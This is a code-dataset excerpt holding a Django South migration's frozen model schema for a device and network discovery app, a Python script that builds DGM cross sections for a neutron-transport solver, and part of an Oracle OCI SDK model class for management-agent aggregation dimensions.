'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'inbound': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'inbound_connections'", 'on_delete': 'models.PROTECT', 'to': "orm['discovery.Device']"}),
'outbound': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'outbound_connections'", 'on_delete': 'models.PROTECT', 'to': "orm['discovery.Device']"})
},
'discovery.datacenter': {
'Meta': {'ordering': "(u'name',)", 'object_name': 'DataCenter'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '75', 'db_index': 'True'})
},
'discovery.deprecationkind': {
'Meta': {'object_name': 'DeprecationKind'},
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'default': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'months': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '75', 'db_index': 'True'}),
'remarks': ('django.db.models.fields.TextField', [], {'default': "u''", 'blank': 'True'})
},
'discovery.device': {
'Meta': {'object_name': 'Device'},
'barcode': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '255', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'boot_firmware': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'cached_cost': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'cached_price': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'chassis_position': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'connections': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['discovery.Device']", 'through': "orm['discovery.Connection']", 'symmetrical': 'False'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'dc': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '32', 'null': 'True', 'blank': 'True'}),
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'deprecation_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'deprecation_kind': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['discovery.DeprecationKind']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'device_environment': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['cmdb.CI']", 'null': 'True', 'on_delete': 'models.PROTECT'}),
'diag_firmware': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'hard_firmware': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'logical_parent': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'logicalchild_set'", 'on_delete': 'models.SET_NULL', 'default': 'None', 'to': "orm['discovery.Device']", 'blank': 'True', 'null': 'True'}),
'management': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'managed_set'", 'on_delete': 'models.SET_NULL', 'default': 'None', 'to': "orm['discovery.IPAddress']", 'blank': 'True', 'null': 'True'}),
'margin_kind': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['discovery.MarginKind']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'max_save_priority': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'mgmt_firmware': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'model': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'device_set'", 'on_delete': 'models.SET_NULL', 'default': 'None', 'to': "orm['discovery.DeviceModel']", 'blank': 'True', 'null': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'name2': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '255', 'null': 'True', 'blank': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'child_set'", 'on_delete': 'models.SET_NULL', 'default': 'None', 'to': "orm['discovery.Device']", 'blank': 'True', 'null': 'True'}),
'position': ('django.db.models.fields.CharField', [], {'max_length': '16', 'null': 'True', 'blank': 'True'}),
'price': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'purchase_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'rack': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '32', 'null': 'True', 'blank': 'True'}),
'remarks': ('django.db.models.fields.TextField', [], {'default': "u''", 'blank': 'True'}),
'role': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'save_priorities': ('django.db.models.fields.TextField', [], {'default': "u''"}),
'service': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['cmdb.CI']", 'null': 'True', 'on_delete': 'models.PROTECT'}),
'sn': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '255', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'support_expiration_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'support_kind': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '255', 'null': 'True', 'blank': 'True'}),
'uptime_seconds': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'uptime_timestamp': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'venture': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['business.Venture']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'venture_role': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['business.VentureRole']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'verified': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'warranty_expiration_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'})
},
'discovery.devicemodel': {
'Meta': {'object_name': 'DeviceModel'},
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'chassis_size': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'max_save_priority': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'save_priorities': ('django.db.models.fields.TextField', [], {'default': "u''"}),
'type': ('django.db.models.fields.PositiveIntegerField', [], {'default': '401'})
},
'discovery.discoveryqueue': {
'Meta': {'ordering': "(u'name',)", 'object_name': 'DiscoveryQueue'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '75', 'db_index': 'True'})
},
'discovery.environment': {
'Meta': {'ordering': "(u'name',)", 'object_name': 'Environment'},
'data_center': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['discovery.DataCenter']"}),
'domain': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'hosts_naming_template': ('django.db.models.fields.CharField', [], {'max_length': '30'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '75', 'db_index': 'True'}),
'next_server': ('django.db.models.fields.CharField', [], {'default': "u''", 'max_length': '32', 'blank': 'True'}),
'queue': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['discovery.DiscoveryQueue']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'remarks': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'})
},
'discovery.ipaddress': {
'Meta': {'object_name': 'IPAddress'},
'address': ('django.db.models.fields.IPAddressField', [], {'default': 'None', 'max_length': '15', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'dead_ping_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'device': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['discovery.Device']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'dns_info': ('django.db.models.fields.TextField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'hostname': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '255', 'null': 'True', 'blank': 'True'}),
'http_family': ('django.db.models.fields.TextField', [], {'default': 'None', 'max_length': '64', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_buried': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_management': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_public': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_plugins': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'last_puppet': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'network': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['discovery.Network']", 'null': 'True', 'blank': 'True'}),
'number': ('django.db.models.fields.BigIntegerField', [], {'unique': 'True'}),
'scan_summary': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['scan.ScanSummary']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'snmp_community': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '64', 'null': 'True', 'blank': 'True'}),
'snmp_name': ('django.db.models.fields.TextField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'snmp_version': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '5', 'null': 'True', 'blank': 'True'}),
'venture': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['business.Venture']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'})
},
'discovery.marginkind': {
'Meta': {'object_name': 'MarginKind'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'margin': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '75', 'db_index': 'True'}),
'remarks': ('django.db.models.fields.TextField', [], {'default': "u''", 'blank': 'True'})
},
'discovery.network': {
'Meta': {'ordering': "(u'vlan',)", 'object_name': 'Network'},
'address': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '18'}),
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'custom_dns_servers': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['dnsedit.DNSServer']", 'null': 'True', 'blank': 'True'}),
'data_center': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['discovery.DataCenter']", 'null': 'True', 'blank': 'True'}),
'dhcp_broadcast': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'dhcp_config': ('django.db.models.fields.TextField', [], {'default': "u''", 'blank': 'True'}),
'environment': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['discovery.Environment']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'gateway': ('django.db.models.fields.IPAddressField', [], {'default': 'None', 'max_length': '15', 'null': 'True', 'blank': 'True'}),
'gateway_as_int': ('django.db.models.fields.PositiveIntegerField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ignore_addresses': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'kind': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['discovery.NetworkKind']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'last_scan': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'max_ip': ('django.db.models.fields.PositiveIntegerField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'min_ip': ('django.db.models.fields.PositiveIntegerField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '75', 'db_index': 'True'}),
'racks': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['discovery.Device']", 'symmetrical': 'False'}),
'remarks': ('django.db.models.fields.TextField', [], {'default': "u''", 'blank': 'True'}),
'reserved': ('django.db.models.fields.PositiveIntegerField', [], {'default': '10'}),
'reserved_top_margin': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'terminators': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['discovery.NetworkTerminator']", 'symmetrical': 'False'}),
'vlan': ('django.db.models.fields.PositiveIntegerField', [], {'default': 'None', 'null': 'True', 'blank': 'True'})
},
'discovery.networkkind': {
'Meta': {'ordering': "(u'name',)", 'object_name': 'NetworkKind'},
'icon': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '32', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '75', 'db_index': 'True'})
},
'discovery.networkterminator': {
'Meta': {'ordering': "(u'name',)", 'object_name': 'NetworkTerminator'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '75', 'db_index': 'True'})
},
'dnsedit.dnsserver': {
'Meta': {'object_name': 'DNSServer'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ip_address': ('django.db.models.fields.IPAddressField', [], {'unique': 'True', 'max_length': '15'}),
'is_default': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'})
},
'scan.scansummary': {
'Meta': {'object_name': 'ScanSummary'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'false_positive_checksum': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'job_id': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '36'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'auto_now_add': 'True', 'blank': 'True'}),
'previous_checksum': ('django.db.models.fields.CharField', [], {'max_length': '32'})
},
'tags.tag': {
'Meta': {'object_name': 'Tag'},
'author': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['account.Profile']"}),
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'tags_tag_tags'", 'to': "orm['contenttypes.ContentType']"}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.PositiveIntegerField', [], {'default': '39'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '75'}),
'object_id': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'}),
'official': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'stem': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "u'related_tags'", 'null': 'True', 'to': "orm['tags.TagStem']"})
},
'tags.tagstem': {
'Meta': {'object_name': 'TagStem'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.PositiveIntegerField', [], {'default': '39'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '75'}),
'tag_count': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
}
}
complete_apps = ['deployment'] | en | 0.751659 | # -*- coding: utf-8 -*- # Adding field 'ArchivedDeployment.service' # Adding field 'ArchivedDeployment.device_environment' # Adding field 'Deployment.service' # Adding field 'Deployment.device_environment' # Deleting field 'ArchivedDeployment.service' # Deleting field 'ArchivedDeployment.device_environment' # Deleting field 'Deployment.service' # Deleting field 'Deployment.device_environment' | 2.186032 | 2 |
SPH/sphbwr_example2.py | RLReed/unotran | 0 | 8562 | import numpy as np
import sys
sys.path.append('/homes/rlreed/workspace/unotran/src')
from coarseBounds import computeBounds, Grouping
import pickle
from makeDLPbasis import makeBasis as makeDLP
from makeKLTbasis import makeBasis as makeKLT
import sph
import sph_dgm
import pydgm
def buildGEO(ass_map):
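    # Added descriptive note (editor's comment, not in the original script): build a 1-D
    # pin-by-pin geometry from the assembly map; returns the number of pins, the per-pin
    # fine-mesh counts, the cumulative coarse-mesh edges, and the material map.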
fine_map = [1]
coarse_map = [1.26]
material_map = [[1], [2], [3], [4], [5], [6], [7], [8], [9], [10]]
npins = len(ass_map)
cm = [0.0]
fm = []
mm = []
for i, ass in enumerate(ass_map):
mm += material_map[ass]
cm += coarse_map
fm += fine_map
cm = np.cumsum(cm)
return npins, fm, cm, mm
def makeDGMXS(G, refXS, dgmstructure, basisType):
if 'klt' in basisType:
makeKLT(basisType, dgmstructure)
else:
makeDLP(dgmstructure)
dgmstructure.fname = '{}_{}'.format(basisType, dgmstructure.fname)
fname = '_homo.'.join(xs_name.split('.'))
refXS.write_homogenized_XS(fname)
nPin, fm, cm, mm = buildGEO(pin_map)
dgm = sph_dgm.DGMSOLVER(G, fname, fm, cm, mm, nPin, dgmstructure, solveFlag=False)
pydgm.dgmsolver.initialize_dgmsolver()
dgm.extractInfo()
pydgm.dgmsolver.finalize_dgmsolver()
pydgm.control.finalize_control()
nCellPerPin = dgm.phi.shape[2] // dgm.npin
return sph_dgm.XS(G, nCellPerPin, dgm.sig_t, dgm.vsig_f, dgm.chi, dgm.sig_s)
if __name__ == '__main__':
np.set_printoptions(precision=6)
G = 44
dgmstructure = computeBounds(G, 'full', 1, 0.0, 1.3, 60)
fname = dgmstructure.fname
xs_name = 'XS/{}gXS.anlxs'.format(G)
pin_map = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
data_path = 'data2'
# Get the homogenized cross sections
refXS = pickle.load(open('{}/refXS_sph_space_{}.p'.format(data_path, G), 'rb'))
for basis in ['dlp', 'klt_full', 'klt_combine', 'klt_pins_full']:
dgmstructure.fname = fname
XS = makeDGMXS(G, refXS, dgmstructure, basis)
pickle.dump(XS, open('{}/refXS_dgm_{}_{}_h{}.p'.format(data_path, dgmstructure.fname, 'fine_mu', 0), 'wb'))
| import numpy as np
import sys
sys.path.append('/homes/rlreed/workspace/unotran/src')
from coarseBounds import computeBounds, Grouping
import pickle
from makeDLPbasis import makeBasis as makeDLP
from makeKLTbasis import makeBasis as makeKLT
import sph
import sph_dgm
import pydgm
def buildGEO(ass_map):
fine_map = [1]
coarse_map = [1.26]
material_map = [[1], [2], [3], [4], [5], [6], [7], [8], [9], [10]]
npins = len(ass_map)
cm = [0.0]
fm = []
mm = []
for i, ass in enumerate(ass_map):
mm += material_map[ass]
cm += coarse_map
fm += fine_map
cm = np.cumsum(cm)
return npins, fm, cm, mm
def makeDGMXS(G, refXS, dgmstructure, basisType):
if 'klt' in basisType:
makeKLT(basisType, dgmstructure)
else:
makeDLP(dgmstructure)
dgmstructure.fname = '{}_{}'.format(basisType, dgmstructure.fname)
fname = '_homo.'.join(xs_name.split('.'))
refXS.write_homogenized_XS(fname)
nPin, fm, cm, mm = buildGEO(pin_map)
dgm = sph_dgm.DGMSOLVER(G, fname, fm, cm, mm, nPin, dgmstructure, solveFlag=False)
pydgm.dgmsolver.initialize_dgmsolver()
dgm.extractInfo()
pydgm.dgmsolver.finalize_dgmsolver()
pydgm.control.finalize_control()
nCellPerPin = dgm.phi.shape[2] // dgm.npin
return sph_dgm.XS(G, nCellPerPin, dgm.sig_t, dgm.vsig_f, dgm.chi, dgm.sig_s)
if __name__ == '__main__':
np.set_printoptions(precision=6)
G = 44
dgmstructure = computeBounds(G, 'full', 1, 0.0, 1.3, 60)
fname = dgmstructure.fname
xs_name = 'XS/{}gXS.anlxs'.format(G)
pin_map = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
data_path = 'data2'
# Get the homogenized cross sections
refXS = pickle.load(open('{}/refXS_sph_space_{}.p'.format(data_path, G), 'rb'))
for basis in ['dlp', 'klt_full', 'klt_combine', 'klt_pins_full']:
dgmstructure.fname = fname
XS = makeDGMXS(G, refXS, dgmstructure, basis)
pickle.dump(XS, open('{}/refXS_dgm_{}_{}_h{}.p'.format(data_path, dgmstructure.fname, 'fine_mu', 0), 'wb'))
| en | 0.745112 | # Get the homogenized cross sections | 1.872758 | 2 |
src/oci/management_agent/models/management_agent_aggregation_dimensions.py | CentroidChef/oci-python-sdk | 249 | 8563 | # coding: utf-8
# Copyright (c) 2016, 2021, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
class ManagementAgentAggregationDimensions(object):
"""
The Aggregation of Management Agent Dimensions
"""
#: A constant which can be used with the availability_status property of a ManagementAgentAggregationDimensions.
#: This constant has a value of "ACTIVE"
AVAILABILITY_STATUS_ACTIVE = "ACTIVE"
#: A constant which can be used with the availability_status property of a ManagementAgentAggregationDimensions.
#: This constant has a value of "SILENT"
AVAILABILITY_STATUS_SILENT = "SILENT"
#: A constant which can be used with the availability_status property of a ManagementAgentAggregationDimensions.
#: This constant has a value of "NOT_AVAILABLE"
AVAILABILITY_STATUS_NOT_AVAILABLE = "NOT_AVAILABLE"
#: A constant which can be used with the platform_type property of a ManagementAgentAggregationDimensions.
#: This constant has a value of "LINUX"
PLATFORM_TYPE_LINUX = "LINUX"
#: A constant which can be used with the platform_type property of a ManagementAgentAggregationDimensions.
#: This constant has a value of "WINDOWS"
PLATFORM_TYPE_WINDOWS = "WINDOWS"
#: A constant which can be used with the install_type property of a ManagementAgentAggregationDimensions.
#: This constant has a value of "AGENT"
INSTALL_TYPE_AGENT = "AGENT"
#: A constant which can be used with the install_type property of a ManagementAgentAggregationDimensions.
#: This constant has a value of "GATEWAY"
INSTALL_TYPE_GATEWAY = "GATEWAY"
def __init__(self, **kwargs):
"""
Initializes a new ManagementAgentAggregationDimensions object with values from keyword arguments.
The following keyword arguments are supported (corresponding to the getters/setters of this class):
:param availability_status:
The value to assign to the availability_status property of this ManagementAgentAggregationDimensions.
Allowed values for this property are: "ACTIVE", "SILENT", "NOT_AVAILABLE", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:type availability_status: str
:param platform_type:
The value to assign to the platform_type property of this ManagementAgentAggregationDimensions.
Allowed values for this property are: "LINUX", "WINDOWS", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:type platform_type: str
:param version:
The value to assign to the version property of this ManagementAgentAggregationDimensions.
:type version: str
:param has_plugins:
The value to assign to the has_plugins property of this ManagementAgentAggregationDimensions.
:type has_plugins: bool
:param install_type:
The value to assign to the install_type property of this ManagementAgentAggregationDimensions.
Allowed values for this property are: "AGENT", "GATEWAY", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:type install_type: str
"""
self.swagger_types = {
'availability_status': 'str',
'platform_type': 'str',
'version': 'str',
'has_plugins': 'bool',
'install_type': 'str'
}
self.attribute_map = {
'availability_status': 'availabilityStatus',
'platform_type': 'platformType',
'version': 'version',
'has_plugins': 'hasPlugins',
'install_type': 'installType'
}
self._availability_status = None
self._platform_type = None
self._version = None
self._has_plugins = None
self._install_type = None
@property
def availability_status(self):
"""
Gets the availability_status of this ManagementAgentAggregationDimensions.
The availability status of managementAgent
Allowed values for this property are: "ACTIVE", "SILENT", "NOT_AVAILABLE", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:return: The availability_status of this ManagementAgentAggregationDimensions.
:rtype: str
"""
return self._availability_status
@availability_status.setter
def availability_status(self, availability_status):
"""
Sets the availability_status of this ManagementAgentAggregationDimensions.
The availability status of managementAgent
:param availability_status: The availability_status of this ManagementAgentAggregationDimensions.
:type: str
"""
allowed_values = ["ACTIVE", "SILENT", "NOT_AVAILABLE"]
if not value_allowed_none_or_none_sentinel(availability_status, allowed_values):
availability_status = 'UNKNOWN_ENUM_VALUE'
self._availability_status = availability_status
@property
def platform_type(self):
"""
Gets the platform_type of this ManagementAgentAggregationDimensions.
Platform Type
Allowed values for this property are: "LINUX", "WINDOWS", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:return: The platform_type of this ManagementAgentAggregationDimensions.
:rtype: str
"""
return self._platform_type
@platform_type.setter
def platform_type(self, platform_type):
"""
Sets the platform_type of this ManagementAgentAggregationDimensions.
Platform Type
:param platform_type: The platform_type of this ManagementAgentAggregationDimensions.
:type: str
"""
allowed_values = ["LINUX", "WINDOWS"]
if not value_allowed_none_or_none_sentinel(platform_type, allowed_values):
platform_type = 'UNKNOWN_ENUM_VALUE'
self._platform_type = platform_type
@property
def version(self):
"""
Gets the version of this ManagementAgentAggregationDimensions.
Agent image version
:return: The version of this ManagementAgentAggregationDimensions.
:rtype: str
"""
return self._version
@version.setter
def version(self, version):
"""
Sets the version of this ManagementAgentAggregationDimensions.
Agent image version
:param version: The version of this ManagementAgentAggregationDimensions.
:type: str
"""
self._version = version
@property
def has_plugins(self):
"""
Gets the has_plugins of this ManagementAgentAggregationDimensions.
Whether or not a managementAgent has at least one plugin
:return: The has_plugins of this ManagementAgentAggregationDimensions.
:rtype: bool
"""
return self._has_plugins
@has_plugins.setter
def has_plugins(self, has_plugins):
"""
Sets the has_plugins of this ManagementAgentAggregationDimensions.
Whether or not a managementAgent has at least one plugin
:param has_plugins: The has_plugins of this ManagementAgentAggregationDimensions.
:type: bool
"""
self._has_plugins = has_plugins
@property
def install_type(self):
"""
Gets the install_type of this ManagementAgentAggregationDimensions.
The install type, either AGENT or GATEWAY
Allowed values for this property are: "AGENT", "GATEWAY", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:return: The install_type of this ManagementAgentAggregationDimensions.
:rtype: str
"""
return self._install_type
@install_type.setter
def install_type(self, install_type):
"""
Sets the install_type of this ManagementAgentAggregationDimensions.
The install type, either AGENT or GATEWAY
:param install_type: The install_type of this ManagementAgentAggregationDimensions.
:type: str
"""
allowed_values = ["AGENT", "GATEWAY"]
if not value_allowed_none_or_none_sentinel(install_type, allowed_values):
install_type = 'UNKNOWN_ENUM_VALUE'
self._install_type = install_type
def __repr__(self):
return formatted_flat_dict(self)
def __eq__(self, other):
if other is None:
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
| # coding: utf-8
# Copyright (c) 2016, 2021, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
class ManagementAgentAggregationDimensions(object):
"""
The Aggregation of Management Agent Dimensions
"""
#: A constant which can be used with the availability_status property of a ManagementAgentAggregationDimensions.
#: This constant has a value of "ACTIVE"
AVAILABILITY_STATUS_ACTIVE = "ACTIVE"
#: A constant which can be used with the availability_status property of a ManagementAgentAggregationDimensions.
#: This constant has a value of "SILENT"
AVAILABILITY_STATUS_SILENT = "SILENT"
#: A constant which can be used with the availability_status property of a ManagementAgentAggregationDimensions.
#: This constant has a value of "NOT_AVAILABLE"
AVAILABILITY_STATUS_NOT_AVAILABLE = "NOT_AVAILABLE"
#: A constant which can be used with the platform_type property of a ManagementAgentAggregationDimensions.
#: This constant has a value of "LINUX"
PLATFORM_TYPE_LINUX = "LINUX"
